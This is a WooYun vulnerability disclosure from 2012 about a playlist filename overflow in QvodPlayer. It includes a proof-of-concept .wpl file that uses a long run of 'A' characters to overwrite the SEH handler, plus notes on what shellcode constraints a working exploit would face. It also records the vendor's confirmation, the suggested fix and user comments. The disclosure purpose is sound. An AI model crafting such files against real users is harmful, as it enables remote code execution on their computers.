当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013817

漏洞标题:快播播放器播放列表文件溢出

相关厂商:快播

漏洞作者: yy520

提交时间:2012-10-26 18:23

修复时间:2012-12-10 18:24

公开时间:2012-12-10 18:24

漏洞类型:远程代码执行

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-10-26: 细节已通知厂商并且等待厂商处理中
2012-10-26: 厂商已经确认,细节仅向厂商公开
2012-10-29: 细节向第三方安全合作伙伴开放
2012-12-20: 细节向核心白帽子及相关领域专家公开
2012-12-30: 细节向普通白帽子公开
2013-01-09: 细节向实习白帽子公开
2012-12-10: 细节向公众公开

简要描述:

处理播放列表文件之后,在某处再次引用文件名没有限制长度而导致溢出

详细说明:

版本:


<?wpl version="1.0"?>
<smil>
<head>
<meta name="Generator" content="Nothing is true"/>
<title>test</title>
</head>
<body>
<seq>
<media src="AAA......AAAACRAAAAAAAAAA.wma"/>
</seq>
</body>
</smil>


CR之前一共有1900个'A',CR是MultiByteToWideChar之后pop pop ret的地址,将上述代码保存为xxx.wpl
在处理wpl文件之后,在播放列表中显示


当鼠标滑过播放列表中的文件名时,将导致溢出


通过覆盖异常,可以跳转到


然后由于复制内容超出堆栈段的最大地址空间而导致异常,跳到


要想成功利用该漏洞,shellcode必须是可打印字符,然后还经过unicode转换之后还必须能使用,最后该堆栈段,还不能执行,ret2lib把。。。。

漏洞证明:

同上

修复方案:

长度限制

版权声明:转载请注明来源 yy520@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-10-26 19:07

厂商回复:

已经确认,此漏洞将在最近一次发布之前修正。
非常感谢yy520

最新状态:

暂无


漏洞评价:

评论

  1. 2012-10-25 15:32 | Rookie ( 普通白帽子 | Rank:288 漏洞数:78 | 123)

    看毛片利器...

  2. 2012-10-26 20:01 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    居然注册厂商了...

  3. 2012-11-17 16:05 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    神奇的厂商 | 神奇的快播

  4. 2012-12-10 22:58 | z@cx ( 普通白帽子 | Rank:434 漏洞数:56 | 。-。-。)

    这是一个神奇的国度

  5. 2012-12-11 22:17 | 陈再胜 ( 普通白帽子 | Rank:121 漏洞数:13 | 微博收收听~~~●﹏●)

    @xsser 你丫的小心了,天天用快播·······